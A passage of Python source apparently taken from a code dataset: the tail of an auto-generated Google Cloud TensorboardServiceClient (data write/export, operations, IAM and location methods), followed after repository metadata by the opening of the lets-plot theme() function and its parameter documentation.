# in a tensorboard_service.WriteTensorboardExperimentDataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.WriteTensorboardExperimentDataRequest
):
request = tensorboard_service.WriteTensorboardExperimentDataRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_experiment is not None:
request.tensorboard_experiment = tensorboard_experiment
if write_run_data_requests is not None:
request.write_run_data_requests = write_run_data_requests
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.write_tensorboard_experiment_data
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard_experiment", request.tensorboard_experiment),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def write_tensorboard_run_data(
self,
request: Optional[
Union[tensorboard_service.WriteTensorboardRunDataRequest, dict]
] = None,
*,
tensorboard_run: Optional[str] = None,
time_series_data: Optional[
MutableSequence[tensorboard_data.TimeSeriesData]
] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.WriteTensorboardRunDataResponse:
r"""Write time series data points into multiple
TensorboardTimeSeries under a TensorboardRun. If any
data fail to be ingested, an error is returned.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_write_tensorboard_run_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
time_series_data = aiplatform_v1.TimeSeriesData()
time_series_data.tensorboard_time_series_id = "tensorboard_time_series_id_value"
time_series_data.value_type = "BLOB_SEQUENCE"
request = aiplatform_v1.WriteTensorboardRunDataRequest(
tensorboard_run="tensorboard_run_value",
time_series_data=time_series_data,
)
# Make the request
response = client.write_tensorboard_run_data(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.WriteTensorboardRunDataRequest, dict]):
The request object. Request message for
[TensorboardService.WriteTensorboardRunData][google.cloud.aiplatform.v1.TensorboardService.WriteTensorboardRunData].
tensorboard_run (str):
Required. The resource name of the TensorboardRun to
write data to. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}``
This corresponds to the ``tensorboard_run`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
time_series_data (MutableSequence[google.cloud.aiplatform_v1.types.TimeSeriesData]):
Required. The TensorboardTimeSeries
data to write. Values with in a time
series are indexed by their step value.
Repeated writes to the same step will
overwrite the existing value for that
step.
The upper limit of data points per write
request is 5000.
This corresponds to the ``time_series_data`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.WriteTensorboardRunDataResponse:
Response message for
[TensorboardService.WriteTensorboardRunData][google.cloud.aiplatform.v1.TensorboardService.WriteTensorboardRunData].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_run, time_series_data])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.WriteTensorboardRunDataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.WriteTensorboardRunDataRequest):
request = tensorboard_service.WriteTensorboardRunDataRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_run is not None:
request.tensorboard_run = tensorboard_run
if time_series_data is not None:
request.time_series_data = time_series_data
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.write_tensorboard_run_data
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard_run", request.tensorboard_run),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def export_tensorboard_time_series_data(
self,
request: Optional[
Union[tensorboard_service.ExportTensorboardTimeSeriesDataRequest, dict]
] = None,
*,
tensorboard_time_series: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ExportTensorboardTimeSeriesDataPager:
r"""Exports a TensorboardTimeSeries' data. Data is
returned in paginated responses.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_export_tensorboard_time_series_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ExportTensorboardTimeSeriesDataRequest(
tensorboard_time_series="tensorboard_time_series_value",
)
# Make the request
page_result = client.export_tensorboard_time_series_data(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ExportTensorboardTimeSeriesDataRequest, dict]):
The request object. Request message for
[TensorboardService.ExportTensorboardTimeSeriesData][google.cloud.aiplatform.v1.TensorboardService.ExportTensorboardTimeSeriesData].
tensorboard_time_series (str):
Required. The resource name of the TensorboardTimeSeries
to export data from. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}``
This corresponds to the ``tensorboard_time_series`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.services.tensorboard_service.pagers.ExportTensorboardTimeSeriesDataPager:
Response message for
[TensorboardService.ExportTensorboardTimeSeriesData][google.cloud.aiplatform.v1.TensorboardService.ExportTensorboardTimeSeriesData].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_time_series])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ExportTensorboardTimeSeriesDataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.ExportTensorboardTimeSeriesDataRequest
):
request = tensorboard_service.ExportTensorboardTimeSeriesDataRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_time_series is not None:
request.tensorboard_time_series = tensorboard_time_series
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.export_tensorboard_time_series_data
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard_time_series", request.tensorboard_time_series),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ExportTensorboardTimeSeriesDataPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def __enter__(self) -> "TensorboardServiceClient":
return self
def __exit__(self, type, value, traceback):
"""Releases underlying transport's resources.
.. warning::
ONLY use as a context manager if the transport is NOT shared
with other clients! Exiting the with block will CLOSE the transport
and may cause errors in other clients!
"""
self.transport.close()
def list_operations(
self,
request: Optional[operations_pb2.ListOperationsRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operations_pb2.ListOperationsResponse:
r"""Lists operations that match the specified filter in the request.
Args:
request (:class:`~.operations_pb2.ListOperationsRequest`):
The request object. Request message for
`ListOperations` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.operations_pb2.ListOperationsResponse:
Response message for ``ListOperations`` method.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.ListOperationsRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.list_operations,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def get_operation(
self,
request: Optional[operations_pb2.GetOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operations_pb2.Operation:
r"""Gets the latest state of a long-running operation.
Args:
request (:class:`~.operations_pb2.GetOperationRequest`):
The request object. Request message for
`GetOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.operations_pb2.Operation:
An ``Operation`` object.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.GetOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.get_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def delete_operation(
self,
request: Optional[operations_pb2.DeleteOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes a long-running operation.
This method indicates that the client is no longer interested
in the operation result. It does not cancel the operation.
If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request (:class:`~.operations_pb2.DeleteOperationRequest`):
The request object. Request message for
`DeleteOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
None
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.DeleteOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.delete_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
def cancel_operation(
self,
request: Optional[operations_pb2.CancelOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Starts asynchronous cancellation on a long-running operation.
The server makes a best effort to cancel the operation, but success
is not guaranteed. If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request (:class:`~.operations_pb2.CancelOperationRequest`):
The request object. Request message for
`CancelOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
None
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.CancelOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.cancel_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
def wait_operation(
self,
request: Optional[operations_pb2.WaitOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operations_pb2.Operation:
r"""Waits until the specified long-running operation is done or reaches at most
a specified timeout, returning the latest state.
If the operation is already done, the latest state is immediately returned.
If the timeout specified is greater than the default HTTP/RPC timeout, the HTTP/RPC
timeout is used. If the server does not support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request (:class:`~.operations_pb2.WaitOperationRequest`):
The request object. Request message for
`WaitOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.operations_pb2.Operation:
An ``Operation`` object.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.WaitOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.wait_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def set_iam_policy(
self,
request: Optional[iam_policy_pb2.SetIamPolicyRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> policy_pb2.Policy:
r"""Sets the IAM access control policy on the specified function.
Replaces any existing policy.
Args:
request (:class:`~.iam_policy_pb2.SetIamPolicyRequest`):
The request object. Request message for `SetIamPolicy`
method.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.policy_pb2.Policy:
Defines an Identity and Access Management (IAM) policy.
It is used to specify access control policies for Cloud
Platform resources.
A ``Policy`` is a collection of ``bindings``. A
``binding`` binds one or more ``members`` to a single
``role``. Members can be user accounts, service
accounts, Google groups, and domains (such as G Suite).
A ``role`` is a named list of permissions (defined by
IAM or configured by users). A ``binding`` can
optionally specify a ``condition``, which is a logic
expression that further constrains the role binding
based on attributes about the request and/or target
resource.
**JSON Example**
::
{
"bindings": [
{
"role": "roles/resourcemanager.organizationAdmin",
"members": [
"user:mike@example.com",
"group:admins@example.com",
"domain:google.com",
"serviceAccount:my-project-id@appspot.gserviceaccount.com"
]
},
{
"role": "roles/resourcemanager.organizationViewer",
"members": ["user:eve@example.com"],
"condition": {
"title": "expirable access",
"description": "Does not grant access after Sep 2020",
"expression": "request.time <
timestamp('2020-10-01T00:00:00.000Z')",
}
}
]
}
**YAML Example**
::
bindings:
- members:
- user:mike@example.com
- group:admins@example.com
- domain:google.com
- serviceAccount:my-project-id@appspot.gserviceaccount.com
role: roles/resourcemanager.organizationAdmin
- members:
- user:eve@example.com
role: roles/resourcemanager.organizationViewer
condition:
title: expirable access
description: Does not grant access after Sep 2020
expression: request.time < timestamp('2020-10-01T00:00:00.000Z')
For a description of IAM and its features, see the `IAM
developer's
guide <https://cloud.google.com/iam/docs>`__.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = iam_policy_pb2.SetIamPolicyRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.set_iam_policy,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("resource", request.resource),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def get_iam_policy(
self,
request: Optional[iam_policy_pb2.GetIamPolicyRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> policy_pb2.Policy:
r"""Gets the IAM access control policy for a function.
Returns an empty policy if the function exists and does not have a
policy set.
Args:
request (:class:`~.iam_policy_pb2.GetIamPolicyRequest`):
The request object. Request message for `GetIamPolicy`
method.
retry (google.api_core.retry.Retry): Designation of what errors, if
any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.policy_pb2.Policy:
Defines an Identity and Access Management (IAM) policy.
It is used to specify access control policies for Cloud
Platform resources.
A ``Policy`` is a collection of ``bindings``. A
``binding`` binds one or more ``members`` to a single
``role``. Members can be user accounts, service
accounts, Google groups, and domains (such as G Suite).
A ``role`` is a named list of permissions (defined by
IAM or configured by users). A ``binding`` can
optionally specify a ``condition``, which is a logic
expression that further constrains the role binding
based on attributes about the request and/or target
resource.
**JSON Example**
::
{
"bindings": [
{
"role": "roles/resourcemanager.organizationAdmin",
"members": [
"user:mike@example.com",
"group:admins@example.com",
"domain:google.com",
"serviceAccount:my-project-id@appspot.gserviceaccount.com"
]
},
{
"role": "roles/resourcemanager.organizationViewer",
"members": ["user:eve@example.com"],
"condition": {
"title": "expirable access",
"description": "Does not grant access after Sep 2020",
"expression": "request.time <
timestamp('2020-10-01T00:00:00.000Z')",
}
}
]
}
**YAML Example**
::
bindings:
- members:
- user:mike@example.com
- group:admins@example.com
- domain:google.com
- serviceAccount:my-project-id@appspot.gserviceaccount.com
role: roles/resourcemanager.organizationAdmin
- members:
- user:eve@example.com
role: roles/resourcemanager.organizationViewer
condition:
title: expirable access
description: Does not grant access after Sep 2020
expression: request.time < timestamp('2020-10-01T00:00:00.000Z')
For a description of IAM and its features, see the `IAM
developer's
guide <https://cloud.google.com/iam/docs>`__.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = iam_policy_pb2.GetIamPolicyRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.get_iam_policy,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("resource", request.resource),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def test_iam_permissions(
self,
request: Optional[iam_policy_pb2.TestIamPermissionsRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> iam_policy_pb2.TestIamPermissionsResponse:
r"""Tests the specified IAM permissions against the IAM access control
policy for a function.
If the function does not exist, this will return an empty set
of permissions, not a NOT_FOUND error.
Args:
request (:class:`~.iam_policy_pb2.TestIamPermissionsRequest`):
The request object. Request message for
`TestIamPermissions` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.iam_policy_pb2.TestIamPermissionsResponse:
Response message for ``TestIamPermissions`` method.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = iam_policy_pb2.TestIamPermissionsRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.test_iam_permissions,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("resource", request.resource),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def get_location(
self,
request: Optional[locations_pb2.GetLocationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> locations_pb2.Location:
r"""Gets information about a location.
Args:
request (:class:`~.location_pb2.GetLocationRequest`):
The request object. Request message for
`GetLocation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.location_pb2.Location:
Location object.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = locations_pb2.GetLocationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.get_location,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def list_locations(
self,
request: Optional[locations_pb2.ListLocationsRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> locations_pb2.ListLocationsResponse:
r"""Lists information about the supported locations for this service.
Args:
request (:class:`~.location_pb2.ListLocationsRequest`):
The request object. Request message for
`ListLocations` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.location_pb2.ListLocationsResponse:
Response message for ``ListLocations`` method.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = locations_pb2.ListLocationsRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.list_locations,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=package_version.__version__
)
__all__ = ("TensorboardServiceClient",)
|
115ac7dd9c19729be33f8a941fe8cea323e8ef5b
|
d01680fe164d915bb3ffd6b10dea1d7cac503630
|
/python-package/lets_plot/plot/theme_.py
|
af03d76c10599eba970dc84223fa5dc242d5fb0c
|
[
"MIT",
"Apache-2.0",
"LGPL-2.0-or-later",
"BSD-3-Clause",
"LGPL-3.0-only"
] |
permissive
|
JetBrains/lets-plot
|
4ba8edd8910967d5e15d8d0ea1a9cd7a9c50432f
|
af4f6554eb9cc250259a6a6757b5c8d920dde8c4
|
refs/heads/master
| 2023-09-01T04:15:04.414149
| 2023-08-31T16:48:57
| 2023-08-31T16:48:57
| 176,771,727
| 1,264
| 59
|
MIT
| 2023-09-07T12:42:01
| 2019-03-20T16:13:03
|
Kotlin
|
UTF-8
|
Python
| false
| false
| 18,310
|
py
|
theme_.py
|
#
# Copyright (c) 2019. JetBrains s.r.o.
# Use of this source code is governed by the MIT license that can be found in the LICENSE file.
#
from .core import FeatureSpec
__all__ = [
'theme',
'element_blank',
"element_line",
'element_rect',
'element_text',
'margin',
'element_geom',
]
def theme(*,
line=None,
rect=None,
text=None,
title=None,
# ToDo: aspect.ratio
axis=None,
axis_ontop=None, axis_ontop_x=None, axis_ontop_y=None,
axis_title=None, axis_title_x=None, axis_title_y=None,
# ToDo: axis.title.x.top, axis.title.x.bottom
# ToDo: axis.title.y.left, axis.title.y.right
axis_text=None, axis_text_x=None, axis_text_y=None,
# ToDo: axis.text.x.top, axis.text.x.bottom
# ToDo: axis.text.x.left, axis.text.x.right
axis_ticks=None, axis_ticks_x=None, axis_ticks_y=None,
# ToDo: axis.ticks.x.top, axis.ticks.x.bottom
# ToDo: axis.ticks.x.left, axis.ticks.x.right
axis_ticks_length=None, axis_ticks_length_x=None, axis_ticks_length_y=None,
axis_line=None, axis_line_x=None, axis_line_y=None,
# ToDo: axis.line.x.top, axis.line.x.bottom
# ToDo: axis.line.x.left, axis.line.x.right
legend_background=None,
legend_text=None, legend_title=None,
legend_position=None, legend_justification=None, legend_direction=None,
# ToDo: other legend options...
panel_background=None,
panel_border=None,
# ToDo: other panel options...
panel_grid=None,
panel_grid_major=None,
panel_grid_minor=None,
panel_grid_major_x=None,
panel_grid_minor_x=None,
panel_grid_major_y=None,
panel_grid_minor_y=None,
plot_background=None,
plot_title=None,
plot_subtitle=None,
plot_caption=None,
strip_background=None, # ToDo: x/y
strip_text=None, # ToDo: x/y
# ToDo: strip.placement
axis_tooltip=None, axis_tooltip_x=None, axis_tooltip_y=None,
axis_tooltip_text=None, axis_tooltip_text_x=None, axis_tooltip_text_y=None,
tooltip=None,
tooltip_text=None, tooltip_title_text=None,
geom=None
):
"""
Use `theme()` to modify individual components of a theme,
allowing you to control all non-data components of the plot.
Parameters
----------
line : str or dict
All line elements.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_line()` to specify line parameters.
rect : str or dict
All rectangular elements.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_rect()` to specify rectangular element parameters.
text : str or dict
All text elements.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify text parameters.
title : str or dict
All title elements: plot, axes, legends.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify title text parameters, inherited from `text`.
axis : str or dict
All axis elements: lines, ticks, texts, titles.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_line()` to specify axes parameters.
axis_ontop, axis_ontop_x, axis_ontop_y : bool, default=False
Option to place axis (lines, tickmarks and labels) over the data layers.
axis_title, axis_title_x, axis_title_y : str or dict
Labels of axes.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify axes label parameters.
`axis_title_*` inherits from `axis_title` which inherits from `text`.
axis_text, axis_text_x, axis_text_y : str or dict
Tick labels along axes.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify all axes tick label parameters.
`axis_text_*` inherits from `axis_text` which inherits from `text`.
axis_ticks, axis_ticks_x, axis_ticks_y : str or dict
Tick marks along axes.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_line()` to specify all tick mark parameters.
`axis_ticks_*` inherits from `axis_ticks` which inherits from `line`.
axis_ticks_length, axis_ticks_length_x, axis_ticks_length_y : float
Length of tick marks in px.
axis_line, axis_line_x, axis_line_y : str or dict
Lines along axes.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_line()` to specify line parameters along all axes.
`axis_line_*` inherits from `axis_line` which inherits from `line`.
legend_background : str or dict
Background of legend.
Set 'blank' or result of `element_blank()` to draw nothing.
Set `element_rect()` to specify legend background parameters, inherited from `rect`.
legend_text : str or dict
Legend item labels.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify legend item label parameters, inherited from `text`.
legend_title : str or dict
Title of legend.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify legend title parameters, inherited from `title`.
legend_position : {'none', 'left', 'right', 'bottom', 'top'} or list
The position of legends. To remove the plot legend, use the 'none' value.
If parameter is a list, then it should be a two-element numeric vector,
each value of float type between 0 and 1.
legend_justification : str or list
Anchor point for positioning legend. If parameter is a list, then
it should be a two-element numeric vector. The pair [0, 0] corresponds to the
bottom left corner, the pair [1, 1] corresponds to the top right.
For string parameter the only possible value is 'center'.
